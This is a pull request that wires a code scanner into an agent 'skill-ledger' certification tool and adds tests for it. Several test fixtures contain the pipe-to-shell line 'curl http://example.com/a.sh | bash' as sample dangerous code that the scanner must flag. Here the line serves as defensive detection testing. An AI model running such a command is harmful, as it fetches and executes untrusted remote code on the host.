### PR TITLE
feat(sec-core): integrate code-scanner with skill-ledger

### DIFF
--- a/src/agent-sec-core/agent-sec-cli/src/agent_sec_cli/skill_ledger/cli.py
+++ b/src/agent-sec-core/agent-sec-cli/src/agent_sec_cli/skill_ledger/cli.py
@@ -11,6 +11,7 @@ from typing import Optional
 
 import typer
 from agent_sec_cli.security_middleware import invoke
+from agent_sec_cli.security_middleware.result import ActionResult
 
 app = typer.Typer(
     name="skill-ledger",
@@ -39,7 +40,7 @@ app = typer.Typer(
 # ---------------------------------------------------------------------------
 
 
-def _forward(result) -> None:
+def _forward(result: ActionResult) -> None:
     """Print ActionResult stdout/error and exit with its exit_code."""
     if result.stdout:
         typer.echo(result.stdout, nl=False)
@@ -180,7 +181,7 @@ def cmd_certify(
     scanners: Optional[str] = typer.Option(
         None,
         "--scanners",
-        help="Comma-separated scanner names to auto-invoke (e.g., 'skill-vetter,custom')",
+        help="Comma-separated scanner names to auto-invoke (e.g., 'skill-code-scanner')",
     ),
     all_skills: bool = typer.Option(
         False,
@@ -325,7 +326,7 @@ def cmd_list_scanners() -> None:
     ~/.config/agent-sec/skill-ledger/config.json, including their invocation type,
     result parser, and enabled status.
 
-    Use this to discover valid values for the --scanner flag in certify.
+    Use this to discover valid values for the --scanner and --scanners flags in certify.
     """
     result = invoke("skill_ledger", command="list-scanners")
     _forward(result)

--- a/src/agent-sec-core/agent-sec-cli/src/agent_sec_cli/skill_ledger/config.py
+++ b/src/agent-sec-core/agent-sec-cli/src/agent_sec_cli/skill_ledger/config.py
@@ -27,6 +27,13 @@ _DEFAULT_CONFIG: dict[str, Any] = {
             "parser": "findings-array",
             "description": "LLM-driven 4-phase skill audit",
         },
+        {
+            "name": "skill-code-scanner",
+            "type": "builtin",
+            "parser": "findings-array",
+            "enabled": True,
+            "description": "Scan Skill code files via code-scanner",
+        },
     ],
     "parsers": {
         "findings-array": {

--- a/src/agent-sec-core/agent-sec-cli/src/agent_sec_cli/skill_ledger/core/certifier.py
+++ b/src/agent-sec-core/agent-sec-cli/src/agent_sec_cli/skill_ledger/core/certifier.py
@@ -5,7 +5,7 @@ Implements ``agent-sec-cli skill-ledger certify`` with two input modes:
 - **External findings mode** (``--findings``): read a findings file produced
   by an external scanner (e.g. skill-vetter via Agent).
 - **Auto-invoke mode** (no ``--findings``): auto-invoke registered non-``skill``
-  scanners from the registry.  In v1 no such scanners exist; framework only.
+  scanners from the registry.
 
 Three execution phases:
 
@@ -41,8 +41,12 @@ from agent_sec_cli.skill_ledger.models.scan import (
     ScanEntry,
     aggregate_scan_status,
 )
+from agent_sec_cli.skill_ledger.scanner import skill_code_scanner
 from agent_sec_cli.skill_ledger.scanner.parsers import parse_findings
-from agent_sec_cli.skill_ledger.scanner.registry import ScannerRegistry
+from agent_sec_cli.skill_ledger.scanner.registry import (
+    ScannerInfo,
+    ScannerRegistry,
+)
 from agent_sec_cli.skill_ledger.signing.base import SigningBackend
 from agent_sec_cli.skill_ledger.utils import utc_now_iso, validate_skill_dir
 
@@ -136,7 +140,7 @@ def _resolve_parser_and_normalise(
 
 
 # ------------------------------------------------------------------
-# Auto-invoke mode (framework — v1 has no invocable scanners)
+# Auto-invoke mode
 # ------------------------------------------------------------------
 
 
@@ -147,9 +151,8 @@ def _auto_invoke_scanners(
 ) -> list[ScanEntry]:
     """Invoke registered non-``skill`` scanners and collect results.
 
-    In v1 only ``skill-vetter`` (type ``"skill"``) is registered, so this
-    function returns an empty list.  The framework is ready for future
-    ``builtin``/``cli``/``api`` scanner adapters.
+    The built-in ``skill-code-scanner`` adapter is invoked in-process.
+    Other non-skill adapter types are currently skipped.
     """
     invocable = registry.list_invocable_scanners(names=scanner_names)
 
@@ -157,19 +160,59 @@ def _auto_invoke_scanners(
         logger.info("No auto-invocable scanners registered; skipping auto-invoke")
         return []
 
-    # Future: iterate invocable scanners, call adapter, parse, build ScanEntry
     entries: list[ScanEntry] = []
     for scanner_info in invocable:
-        logger.warning(
-            "Scanner %r (type=%r) auto-invoke not yet implemented; skipping",
+        raw_findings = _invoke_scanner(skill_dir, scanner_info)
+        if raw_findings is None:
+            continue
+
+        normalized = _resolve_parser_and_normalise(
+            raw_findings,
             scanner_info.name,
-            scanner_info.type,
+            registry,
         )
-        # TODO: dispatch by scanner_info.type:
-        #   "builtin" → call Python function
-        #   "cli"     → subprocess.run(...)
-        #   "api"     → HTTP POST
+        scanner_version = _scanner_version(scanner_info)
+        entries.append(
+            _build_scan_entry(
+                normalized,
+                scanner_info.name,
+                scanner_version,
+            )
+        )
+
     return entries
+
+
+def _invoke_scanner(
+    skill_dir: str,
+    scanner_info: ScannerInfo,
+) -> list[dict[str, Any]] | None:
+    """Dispatch a registered scanner and return raw findings-array data."""
+    if _is_skill_code_scanner(scanner_info):
+        return skill_code_scanner.scan_skill_code(skill_dir)
+
+    logger.warning(
+        "Scanner %r (type=%r) auto-invoke not implemented; skipping",
+        scanner_info.name,
+        scanner_info.type,
+    )
+    return None
+
+
+def _scanner_version(scanner_info: ScannerInfo) -> str | None:
+    configured_version = scanner_info.extra.get("version")
+    if configured_version is not None:
+        return str(configured_version)
+    if _is_skill_code_scanner(scanner_info):
+        return skill_code_scanner.SCANNER_VERSION
+    return None
+
+
+def _is_skill_code_scanner(scanner_info: ScannerInfo) -> bool:
+    return (
+        scanner_info.type == "builtin"
+        and scanner_info.name == skill_code_scanner.SCANNER_NAME
+    )
 
 
 # ------------------------------------------------------------------

--- a/src/agent-sec-core/agent-sec-cli/src/agent_sec_cli/skill_ledger/scanner/skill_code_scanner.py
+++ b/src/agent-sec-core/agent-sec-cli/src/agent_sec_cli/skill_ledger/scanner/skill_code_scanner.py
@@ -1,0 +1,211 @@
+"""Skill directory adapter for the independent code_scanner component."""
+
+import os
+from pathlib import Path
+from typing import Any
+
+from agent_sec_cli import __version__ as AGENT_SEC_VERSION
+from agent_sec_cli.code_scanner.models import (
+    Finding,
+    Language,
+    ScanResult,
+    Verdict,
+)
+from agent_sec_cli.code_scanner.scanner import scan
+
+SCANNER_NAME = "skill-code-scanner"
+SCANNER_VERSION = AGENT_SEC_VERSION
+
+_ERROR_RULE = "code-scanner-error"
+_EXCLUDED_DIRS = frozenset(
+    {
+        ".skill-meta",
+        ".git",
+        "node_modules",
+        "__pycache__",
+        ".pytest_cache",
+        "dist",
+        "build",
+    }
+)
+_MAX_EVIDENCE_ITEMS = 5
+_MAX_EVIDENCE_CHARS = 500
+_MAX_CODE_FILE_BYTES = 1024 * 1024
+
+
+def scan_skill_code(skill_dir: str | Path) -> list[dict[str, Any]]:
+    """Scan code files in *skill_dir* and return findings-array dicts."""
+    root = Path(skill_dir).resolve()
+    findings: list[dict[str, Any]] = []
+
+    for path, language in iter_code_files(root):
+        findings.extend(_scan_file(root, path, language))
+
+    return findings
+
+
+def iter_code_files(skill_dir: str | Path) -> list[tuple[Path, Language]]:
+    """Return supported code files with their detected language."""
+    root = Path(skill_dir).resolve()
+    files: list[tuple[Path, Language]] = []
+
+    for current_root, dirnames, filenames in os.walk(root, followlinks=False):
+        current = Path(current_root)
+        rel_root = current.relative_to(root)
+        if any(part in _EXCLUDED_DIRS for part in rel_root.parts):
+            dirnames[:] = []
+            continue
+
+        dirnames[:] = sorted(
+            dirname
+            for dirname in dirnames
+            if dirname not in _EXCLUDED_DIRS and not (current / dirname).is_symlink()
+        )
+
+        for filename in sorted(filenames):
+            entry = current / filename
+            if entry.is_symlink() or not entry.is_file():
+                continue
+
+            language = detect_language(entry)
+            if language is not None:
+                files.append((entry, language))
+
+    return files
+
+
+def detect_language(path: Path) -> Language | None:
+    """Detect the code_scanner language for a Skill file path."""
+    suffix = path.suffix.lower()
+    if suffix == ".py":
+        return Language.PYTHON
+    if suffix == ".sh":
+        return Language.BASH
+    if suffix:
+        return None
+    return _language_from_shebang(path)
+
+
+def _language_from_shebang(path: Path) -> Language | None:
+    try:
+        with path.open("rb") as fh:
+            first_line = fh.readline(256)
+    except OSError:
+        return None
+
+    if not first_line.startswith(b"#!"):
+        return None
+
+    shebang = first_line[2:].decode("utf-8", errors="ignore").strip()
+    for token in shebang.split():
+        name = Path(token).name.lower()
+        if name.startswith("python"):
+            return Language.PYTHON
+        if name in {"sh", "bash", "zsh", "dash"}:
+            return Language.BASH
+
+    return None
+
+
+def _scan_file(root: Path, path: Path, language: Language) -> list[dict[str, Any]]:
+    try:
+        size = path.stat().st_size
+    except OSError as exc:
+        return [_error_finding(root, path, language, f"failed to stat file: {exc}")]
+
+    if size > _MAX_CODE_FILE_BYTES:
+        return [
+            _error_finding(
+                root,
+                path,
+                language,
+                f"file too large to scan: {size} bytes > {_MAX_CODE_FILE_BYTES} bytes",
+                {"max_file_bytes": _MAX_CODE_FILE_BYTES},
+            )
+        ]
+
+    try:
+        code = path.read_text(encoding="utf-8")
+    except (OSError, UnicodeDecodeError) as exc:
+        return [_error_finding(root, path, language, f"failed to read file: {exc}")]
+
+    if not code.strip():
+        return []
+
+    try:
+        result = scan(code, language)
+    except Exception as exc:
+        return [
+            _error_finding(
+                root,
+                path,
+                language,
+                f"code-scanner raised unexpected error: {type(exc).__name__}: {exc}",
+            )
+        ]
+    if not result.ok or result.verdict == Verdict.ERROR:
+        return [_error_finding(root, path, language, result.summary)]
+
+    return [
+        _finding_to_dict(root, path, result, finding) for finding in result.findings
+    ]
+
+
+def _finding_to_dict(
+    root: Path,
+    path: Path,
+    result: ScanResult,
+    finding: Finding,
+) -> dict[str, Any]:
+    message = finding.desc_zh or finding.desc_en
+    return {
+        "rule": finding.rule_id,
+        "level": finding.severity.value,
+        "message": message,
+        "file": _relative_path(root, path),
+        "metadata": {
+            "source": "code-scanner",
+            "language": result.language.value,
+            "engine_version": result.engine_version,
+            "elapsed_ms": result.elapsed_ms,
+            "evidence": _truncate_evidence(finding.evidence),
+        },
+    }
+
+
+def _error_finding(
+    root: Path,
+    path: Path,
+    language: Language,
+    reason: str,
+    metadata_extra: dict[str, Any] | None = None,
+) -> dict[str, Any]:
+    metadata: dict[str, Any] = {
+        "source": "code-scanner",
+        "language": language.value,
+        "error": reason,
+    }
+    if metadata_extra:
+        metadata.update(metadata_extra)
+
+    return {
+        "rule": _ERROR_RULE,
+        "level": "warn",
+        "message": "code-scanner could not complete this file scan",
+        "file": _relative_path(root, path),
+        "metadata": metadata,
+    }
+
+
+def _relative_path(root: Path, path: Path) -> str:
+    return path.relative_to(root).as_posix()
+
+
+def _truncate_evidence(evidence: list[str]) -> list[str]:
+    truncated: list[str] = []
+    for item in evidence[:_MAX_EVIDENCE_ITEMS]:
+        text = str(item)
+        if len(text) > _MAX_EVIDENCE_CHARS:
+            text = text[:_MAX_EVIDENCE_CHARS] + "...<truncated>"
+        truncated.append(text)
+    return truncated

--- a/src/agent-sec-core/skills/skill-ledger/SKILL.md
+++ b/src/agent-sec-core/skills/skill-ledger/SKILL.md
@@ -260,15 +260,26 @@ cat /tmp/skill-vetter-findings-<SKILL_NAME>.json | python3 -c "import json,sys; 
 
 **前置条件**：Phase 2 已完成，至少一个 Skill 有有效的 findings 文件。
 
-对每个成功扫描的 Skill 执行 `certify`：
+对每个成功扫描的 Skill 执行 `certify`，将 Agent 审查结果和确定性代码扫描结果合并到同一个 SignedManifest。
 
 ### 3.1 执行 certify
+
+先写入 `skill-vetter` 的 Agent 审查结果：
 
 ```bash
 agent-sec-cli skill-ledger certify <SKILL_DIR> \
   --findings /tmp/skill-vetter-findings-<SKILL_NAME>.json \
   --scanner skill-vetter
 ```
+
+再触发内置 `skill-code-scanner`，扫描 Skill 目录中的 Python/Shell 代码文件：
+
+```bash
+agent-sec-cli skill-ledger certify <SKILL_DIR> \
+  --scanners skill-code-scanner
+```
+
+这两个 `certify` 调用可按任意顺序执行；manifest 按 scanner 名称合并 `scans[]` 条目。文件未变化时沿用同一个版本号，只替换或追加对应 scanner 的条目，并重新聚合 `scanStatus`。
 
 > 当 Scanner Registry 中有多个 `skill` 类型扫描器时，对每个扫描器分别调用 `certify --findings <对应 findings> --scanner <对应 scanner>`。`certify` 会自动合并同一 Skill 的多个 scanner 条目到 `scans[]` 数组。
 

--- a/src/agent-sec-core/tests/integration-test/skill-ledger/test_skill_ledger_integration.py
+++ b/src/agent-sec-core/tests/integration-test/skill-ledger/test_skill_ledger_integration.py
@@ -19,7 +19,6 @@ Prerequisites: Python 3.11, source tree
 
 import hashlib
 import json
-import os
 import shutil
 import tempfile
 from dataclasses import dataclass
@@ -90,6 +89,12 @@ def write_findings_file(parent: Path, name: str, findings: list | dict) -> Path:
     path = parent / name
     path.write_text(json.dumps(findings, ensure_ascii=False))
     return path
+
+
+def read_latest_manifest(skill_dir: Path) -> dict:
+    """Read ``.skill-meta/latest.json`` for assertions."""
+    latest = skill_dir / ".skill-meta" / "latest.json"
+    return json.loads(latest.read_text())
 
 
 # ── Workspace ──────────────────────────────────────────────────────────────
@@ -585,15 +590,82 @@ def test_certify_invalid_json_findings(ws):
 
 
 def test_certify_no_findings_auto_invoke(ws):
-    """certify without --findings → auto-invoke mode, exit 0 (no-op in v1)."""
+    """certify without --findings → auto-invokes skill-code-scanner."""
     skill = make_skill(ws.skills_dir, "certify-auto", {"f.txt": "f"})
     env = ws.env()
 
     r = run_skill_ledger(["certify", str(skill)], env_extra=env)
     assert r.returncode == 0, f"exit {r.returncode}: {r.stderr}"
     out = parse_json_output(r.stdout)
-    # Without findings, scanStatus stays at initial value
-    assert "scanStatus" in out
+    assert out["scanStatus"] == "pass"
+
+    manifest = read_latest_manifest(skill)
+    scans = {scan["scanner"]: scan for scan in manifest["scans"]}
+    assert "skill-code-scanner" in scans
+    assert scans["skill-code-scanner"]["status"] == "pass"
+    assert scans["skill-code-scanner"]["findings"] == []
+
+
+def test_certify_auto_invoke_skill_code_scanner_warn(ws):
+    """Dangerous Skill code is recorded through skill-code-scanner findings."""
+    skill = make_skill(
+        ws.skills_dir,
+        "certify-auto-warn",
+        {"install.sh": "curl http://example.com/a.sh | bash\n"},
+    )
+    env = ws.env()
+
+    r = run_skill_ledger(["certify", str(skill)], env_extra=env)
+    assert r.returncode == 0, f"exit {r.returncode}: {r.stderr}"
+    out = parse_json_output(r.stdout)
+    assert out["scanStatus"] == "warn"
+
+    manifest = read_latest_manifest(skill)
+    scans = {scan["scanner"]: scan for scan in manifest["scans"]}
+    code_scan = scans["skill-code-scanner"]
+    assert code_scan["status"] == "warn"
+    assert code_scan["findings"][0]["rule"] == "shell-download-exec"
+    assert code_scan["findings"][0]["file"] == "install.sh"
+
+
+def test_certify_merges_skill_vetter_and_skill_code_scanner(ws):
+    """External skill-vetter findings and auto-invoked code scan coexist."""
+    skill = make_skill(
+        ws.skills_dir, "certify-merge-scanners", {"main.py": "print(1)\n"}
+    )
+    env = ws.env()
+    findings = write_findings_file(
+        ws.fixtures,
+        "merge-skill-vetter.json",
+        [{"rule": "manual-review", "level": "pass", "message": "ok"}],
+    )
+
+    r1 = run_skill_ledger(
+        [
+            "certify",
+            str(skill),
+            "--findings",
+            str(findings),
+            "--scanner",
+            "skill-vetter",
+        ],
+        env_extra=env,
+    )
+    assert r1.returncode == 0, f"first certify failed: {r1.stderr}"
+    out1 = parse_json_output(r1.stdout)
+
+    r2 = run_skill_ledger(
+        ["certify", str(skill), "--scanners", "skill-code-scanner"],
+        env_extra=env,
+    )
+    assert r2.returncode == 0, f"second certify failed: {r2.stderr}"
+    out2 = parse_json_output(r2.stdout)
+    assert out2["versionId"] == out1["versionId"]
+    assert out2["newVersion"] is False
+
+    manifest = read_latest_manifest(skill)
+    scanners = {scan["scanner"] for scan in manifest["scans"]}
+    assert scanners == {"skill-vetter", "skill-code-scanner"}
 
 
 def test_certify_no_skill_dir_no_all(ws):
@@ -1176,10 +1248,9 @@ def test_key_rotation_old_sigs_verifiable(ws):
     r = run_skill_ledger(["init-keys", "--force"], env_extra=env)
     assert r.returncode == 0, f"init-keys --force failed: {r.stderr}"
     new_fp = parse_json_output(r.stdout)["fingerprint"]
-    assert new_fp != old_fp, (
-        f"Key rotation must produce a different fingerprint: "
-        f"old={old_fp}, new={new_fp}"
-    )
+    assert (
+        new_fp != old_fp
+    ), f"Key rotation must produce a different fingerprint: old={old_fp}, new={new_fp}"
     assert new_fp.startswith("sha256:"), f"Fingerprint format unexpected: {new_fp}"
 
     # --- Old manifest must still verify via keyring fallback ---
@@ -1193,7 +1264,6 @@ def test_key_rotation_old_sigs_verifiable(ws):
         f"but got status={out['status']}. Keyring archival may be broken."
     )
     # Specifically expect 'pass' since files are unchanged:
-    assert out["status"] == "pass", (
-        f"Expected 'pass' for unchanged skill after key rotation, "
-        f"got '{out['status']}'"
-    )
+    assert (
+        out["status"] == "pass"
+    ), f"Expected 'pass' for unchanged skill after key rotation, got '{out['status']}'"

--- a/src/agent-sec-core/tests/unit-test/skill_ledger/test_config.py
+++ b/src/agent-sec-core/tests/unit-test/skill_ledger/test_config.py
@@ -7,8 +7,6 @@ These tests protect the configuration-layer invariants:
 4. Compact — specific paths subsumed by a glob are pruned.
 """
 
-import json
-import os
 import tempfile
 import unittest
 from pathlib import Path
@@ -35,6 +33,13 @@ class TestDefaultConfig(unittest.TestCase):
 
     def test_default_signing_backend(self):
         self.assertEqual(_DEFAULT_CONFIG["signingBackend"], "ed25519")
+
+    def test_default_scanners_include_skill_code_scanner(self):
+        scanners = {scanner["name"]: scanner for scanner in _DEFAULT_CONFIG["scanners"]}
+        self.assertIn("skill-vetter", scanners)
+        self.assertIn("skill-code-scanner", scanners)
+        self.assertEqual(scanners["skill-code-scanner"]["type"], "builtin")
+        self.assertTrue(scanners["skill-code-scanner"]["enabled"])
 
 
 class TestAdditiveMerge(unittest.TestCase):

--- a/src/agent-sec-core/tests/unit-test/skill_ledger/test_scanner.py
+++ b/src/agent-sec-core/tests/unit-test/skill_ledger/test_scanner.py
@@ -9,14 +9,32 @@ These tests protect:
 """
 
 import unittest
+from pathlib import Path
+from tempfile import TemporaryDirectory
+from unittest.mock import patch
 
-from agent_sec_cli.skill_ledger.core.certifier import _determine_scan_status
+from agent_sec_cli.code_scanner.models import (
+    Finding,
+    Language,
+    ScanResult,
+    Severity,
+    Verdict,
+)
+from agent_sec_cli.skill_ledger.core.certifier import (
+    _auto_invoke_scanners,
+    _determine_scan_status,
+)
 from agent_sec_cli.skill_ledger.models.finding import NormalizedFinding
 from agent_sec_cli.skill_ledger.scanner.parsers import parse_findings
 from agent_sec_cli.skill_ledger.scanner.registry import (
     ParserInfo,
-    ScannerInfo,
     ScannerRegistry,
+)
+from agent_sec_cli.skill_ledger.scanner.skill_code_scanner import (
+    SCANNER_VERSION,
+    detect_language,
+    iter_code_files,
+    scan_skill_code,
 )
 
 
@@ -207,6 +225,255 @@ class TestDetermineStatusFromFindings(unittest.TestCase):
             NormalizedFinding(rule="r2", level="warn", message="iffy"),
         ]
         self.assertEqual(_determine_scan_status(findings), "warn")
+
+
+class TestSkillCodeScannerAdapter(unittest.TestCase):
+    """Skill-level adapter around the independent code_scanner package."""
+
+    def _write(self, root: Path, rel: str, content: str | bytes) -> Path:
+        path = root / rel
+        path.parent.mkdir(parents=True, exist_ok=True)
+        if isinstance(content, bytes):
+            path.write_bytes(content)
+        else:
+            path.write_text(content, encoding="utf-8")
+        return path
+
+    def test_language_detection_by_extension_and_shebang(self) -> None:
+        with TemporaryDirectory() as tmp:
+            root = Path(tmp).resolve()
+            py = self._write(root, "main.py", "print('hello')\n")
+            sh = self._write(root, "run.sh", "echo hello\n")
+            bash = self._write(root, "tool", "#!/usr/bin/env bash\necho hello\n")
+            python = self._write(root, "worker", "#!/usr/bin/env python3\nprint(1)\n")
+            text = self._write(root, "README.md", "# docs\n")
+
+            self.assertEqual(detect_language(py), Language.PYTHON)
+            self.assertEqual(detect_language(sh), Language.BASH)
+            self.assertEqual(detect_language(bash), Language.BASH)
+            self.assertEqual(detect_language(python), Language.PYTHON)
+            self.assertIsNone(detect_language(text))
+
+    def test_iter_code_files_skips_excluded_dirs_and_symlinks(self) -> None:
+        with TemporaryDirectory() as tmp:
+            base = Path(tmp).resolve()
+            root = base / "skill"
+            root.mkdir()
+            self._write(root, "main.py", "print('hello')\n")
+            self._write(root, ".skill-meta/hidden.py", "print('skip')\n")
+            self._write(root, "node_modules/pkg/script.sh", "echo skip\n")
+            self._write(root, "notes.txt", "plain text\n")
+            target = self._write(root, "target.py", "print('skip symlink')\n")
+            symlink = root / "linked.py"
+            symlink_dir = root / "linked-dir"
+            outside = base / "outside"
+            try:
+                symlink.symlink_to(target)
+            except OSError:
+                symlink = None
+            try:
+                outside.mkdir()
+                self._write(outside, "escaped.py", "print('escape')\n")
+                symlink_dir.symlink_to(outside, target_is_directory=True)
+            except OSError:
+                symlink_dir = None
+
+            files = {
+                (path.relative_to(root).as_posix(), language)
+                for path, language in iter_code_files(root)
+            }
+
+            self.assertIn(("main.py", Language.PYTHON), files)
+            self.assertIn(("target.py", Language.PYTHON), files)
+            self.assertNotIn((".skill-meta/hidden.py", Language.PYTHON), files)
+            self.assertNotIn(("node_modules/pkg/script.sh", Language.BASH), files)
+            self.assertNotIn(("notes.txt", Language.BASH), files)
+            if symlink is not None:
+                self.assertNotIn(("linked.py", Language.PYTHON), files)
+            if symlink_dir is not None:
+                self.assertNotIn(("linked-dir/escaped.py", Language.PYTHON), files)
+
+    def test_empty_code_file_is_skipped(self) -> None:
+        with TemporaryDirectory() as tmp:
+            root = Path(tmp).resolve()
+            self._write(root, "empty.py", "   \n\t")
+
+            self.assertEqual(scan_skill_code(root), [])
+
+    def test_code_scanner_finding_is_mapped_to_normalized_finding(self) -> None:
+        scan_result = ScanResult(
+            ok=True,
+            verdict=Verdict.WARN,
+            summary="Detected 1 issue(s)",
+            findings=[
+                Finding(
+                    rule_id="shell-download-exec",
+                    severity=Severity.WARN,
+                    desc_zh="下载并执行远程脚本",
+                    desc_en="download and execute",
+                    evidence=["curl http://example.com/a.sh | bash"],
+                )
+            ],
+            language=Language.BASH,
+            engine_version="test-version",
+            elapsed_ms=3,
+        )
+
+        with TemporaryDirectory() as tmp:
+            root = Path(tmp).resolve()
+            self._write(
+                root, "scripts/install.sh", "curl http://example.com/a.sh | bash\n"
+            )
+            with patch(
+                "agent_sec_cli.skill_ledger.scanner.skill_code_scanner.scan",
+                return_value=scan_result,
+            ):
+                findings = scan_skill_code(root)
+
+        self.assertEqual(len(findings), 1)
+        finding = findings[0]
+        self.assertEqual(finding["rule"], "shell-download-exec")
+        self.assertEqual(finding["level"], "warn")
+        self.assertEqual(finding["message"], "下载并执行远程脚本")
+        self.assertEqual(finding["file"], "scripts/install.sh")
+        self.assertEqual(finding["metadata"]["source"], "code-scanner")
+        self.assertEqual(finding["metadata"]["language"], "bash")
+        self.assertEqual(finding["metadata"]["engine_version"], "test-version")
+        self.assertEqual(
+            finding["metadata"]["evidence"],
+            ["curl http://example.com/a.sh | bash"],
+        )
+
+    def test_scan_error_becomes_warn_finding(self) -> None:
+        scan_result = ScanResult(
+            ok=False,
+            verdict=Verdict.ERROR,
+            summary="scan error: internal error",
+            findings=[],
+            language=Language.PYTHON,
+            elapsed_ms=1,
+        )
+
+        with TemporaryDirectory() as tmp:
+            root = Path(tmp).resolve()
+            self._write(root, "main.py", "print('hello')\n")
+            with patch(
+                "agent_sec_cli.skill_ledger.scanner.skill_code_scanner.scan",
+                return_value=scan_result,
+            ):
+                findings = scan_skill_code(root)
+
+        self.assertEqual(len(findings), 1)
+        self.assertEqual(findings[0]["rule"], "code-scanner-error")
+        self.assertEqual(findings[0]["level"], "warn")
+        self.assertEqual(findings[0]["file"], "main.py")
+        self.assertIn("scan error", findings[0]["metadata"]["error"])
+        self.assertNotIn("max_file_bytes", findings[0]["metadata"])
+
+    def test_unexpected_scan_exception_becomes_warn_finding(self) -> None:
+        with TemporaryDirectory() as tmp:
+            root = Path(tmp).resolve()
+            self._write(root, "main.py", "print('hello')\n")
+            with patch(
+                "agent_sec_cli.skill_ledger.scanner.skill_code_scanner.scan",
+                side_effect=RuntimeError("rule load failed"),
+            ):
+                findings = scan_skill_code(root)
+
+        self.assertEqual(len(findings), 1)
+        self.assertEqual(findings[0]["rule"], "code-scanner-error")
+        self.assertEqual(findings[0]["level"], "warn")
+        self.assertEqual(findings[0]["file"], "main.py")
+        self.assertIn("RuntimeError", findings[0]["metadata"]["error"])
+        self.assertIn("rule load failed", findings[0]["metadata"]["error"])
+
+    def test_large_file_becomes_warn_finding(self) -> None:
+        with TemporaryDirectory() as tmp:
+            root = Path(tmp).resolve()
+            self._write(root, "large.py", "x" * (1024 * 1024 + 1))
+            with patch(
+                "agent_sec_cli.skill_ledger.scanner.skill_code_scanner.scan"
+            ) as mocked_scan:
+                findings = scan_skill_code(root)
+
+        mocked_scan.assert_not_called()
+        self.assertEqual(len(findings), 1)
+        self.assertEqual(findings[0]["rule"], "code-scanner-error")
+        self.assertEqual(findings[0]["level"], "warn")
+        self.assertIn("file too large", findings[0]["metadata"]["error"])
+        self.assertEqual(findings[0]["metadata"]["max_file_bytes"], 1024 * 1024)
+
+
+class TestAutoInvokeSkillCodeScanner(unittest.TestCase):
+    """Auto-invoke dispatch for the built-in skill-code-scanner adapter."""
+
+    def _registry(self) -> ScannerRegistry:
+        return ScannerRegistry.from_config(
+            {
+                "scanners": [
+                    {
+                        "name": "skill-code-scanner",
+                        "type": "builtin",
+                        "parser": "findings-array",
+                        "enabled": True,
+                    }
+                ],
+                "parsers": {"findings-array": {"type": "findings-array"}},
+            }
+        )
+
+    def test_auto_invoke_empty_findings_produces_pass_entry(self) -> None:
+        with (
+            TemporaryDirectory() as tmp,
+            patch(
+                "agent_sec_cli.skill_ledger.core.certifier.skill_code_scanner.scan_skill_code",
+                return_value=[],
+            ),
+        ):
+            entries = _auto_invoke_scanners(tmp, self._registry())
+
+        self.assertEqual(len(entries), 1)
+        self.assertEqual(entries[0].scanner, "skill-code-scanner")
+        self.assertEqual(entries[0].version, SCANNER_VERSION)
+        self.assertEqual(entries[0].status, "pass")
+        self.assertEqual(entries[0].findings, [])
+
+    def test_auto_invoke_warn_and_deny_statuses(self) -> None:
+        cases = [
+            ([{"rule": "r1", "level": "warn", "message": "warn"}], "warn"),
+            ([{"rule": "r2", "level": "deny", "message": "deny"}], "deny"),
+        ]
+        for raw_findings, expected_status in cases:
+            with (
+                self.subTest(expected_status=expected_status),
+                TemporaryDirectory() as tmp,
+                patch(
+                    "agent_sec_cli.skill_ledger.core.certifier.skill_code_scanner.scan_skill_code",
+                    return_value=raw_findings,
+                ),
+            ):
+                entries = _auto_invoke_scanners(tmp, self._registry())
+
+            self.assertEqual(len(entries), 1)
+            self.assertEqual(entries[0].status, expected_status)
+            self.assertEqual(entries[0].findings[0]["rule"], raw_findings[0]["rule"])
+
+    def test_auto_invoke_honors_scanner_name_filter(self) -> None:
+        with (
+            TemporaryDirectory() as tmp,
+            patch(
+                "agent_sec_cli.skill_ledger.core.certifier.skill_code_scanner.scan_skill_code",
+                return_value=[],
+            ) as mocked_scan,
+        ):
+            entries = _auto_invoke_scanners(
+                tmp,
+                self._registry(),
+                scanner_names=["other-scanner"],
+            )
+
+        self.assertEqual(entries, [])
+        mocked_scan.assert_not_called()
 
 
 if __name__ == "__main__":

--- a/src/agent-sec-core/tests/unit-test/skill_ledger/test_workflows.py
+++ b/src/agent-sec-core/tests/unit-test/skill_ledger/test_workflows.py
@@ -31,8 +31,6 @@ from agent_sec_cli.skill_ledger.signing.base import SigningBackend
 from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey
 from cryptography.hazmat.primitives.serialization import (
     Encoding,
-    NoEncryption,
-    PrivateFormat,
     PublicFormat,
 )
 
@@ -390,12 +388,19 @@ class TestCertifyWorkflow(SkillDirTestCase):
         self.assertEqual(result["scanStatus"], "deny")
 
     def test_auto_invoke_mode_no_crash(self):
-        """Certify without --findings (auto-invoke) should not crash in v1."""
+        """Certify without --findings auto-invokes skill-code-scanner."""
         # First create a manifest
         check(self.skill_dir, self.backend)
-        # Auto-invoke mode — no invocable scanners, should succeed gracefully
         result = certify(self.skill_dir, self.backend)
         self.assertIn("versionId", result)
+        self.assertEqual(result["scanStatus"], "pass")
+
+        latest = os.path.join(self.skill_dir, ".skill-meta", "latest.json")
+        with open(latest, "r") as f:
+            data = json.load(f)
+        scans = {scan["scanner"]: scan for scan in data["scans"]}
+        self.assertIn("skill-code-scanner", scans)
+        self.assertEqual(scans["skill-code-scanner"]["status"], "pass")
 
 
 # ---------------------------------------------------------------------------


### PR DESCRIPTION
## Description

Integrate the existing `code-scanner` component into Skill Ledger through a Skill-side `skill-code-scanner` adapter. The adapter discovers Python and shell files in a Skill directory, invokes `agent_sec_cli.code_scanner.scan()`, and maps results into the existing Skill Ledger `NormalizedFinding` / `ScanEntry` model.

This PR also registers `skill-code-scanner` as a default builtin scanner for `skill-ledger certify`, updates the Skill Ledger workflow guidance, and adds unit/integration coverage for file discovery, language detection, scan-result mapping, scanner dispatch, status aggregation, scan-error containment, and multi-scanner manifest merge behavior.

## Related Issue

no-issue: requested Skill Ledger code-scanner integration; no GitHub issue is available.

## Type of Change

- [ ] Bug fix (non-breaking change that fixes an issue)
- [x] New feature (non-breaking change that adds functionality)
- [ ] Breaking change (fix or feature that would cause existing functionality to not work as expected)
- [x] Documentation update
- [ ] Refactoring (no functional change)
- [ ] Performance improvement
- [ ] CI/CD or build changes

## Scope

- [ ] `cosh` (copilot-shell)
- [x] `sec-core` (agent-sec-core)
- [ ] `skill` (os-skills)
- [ ] `sight` (agentsight)
- [ ] `tokenless` (tokenless)
- [ ] Multiple / Project-wide

## Checklist

- [x] I have read the [Contributing Guide](../CONTRIBUTING.md)
- [x] My code follows the project code style
- [x] I have added tests that prove my feature works
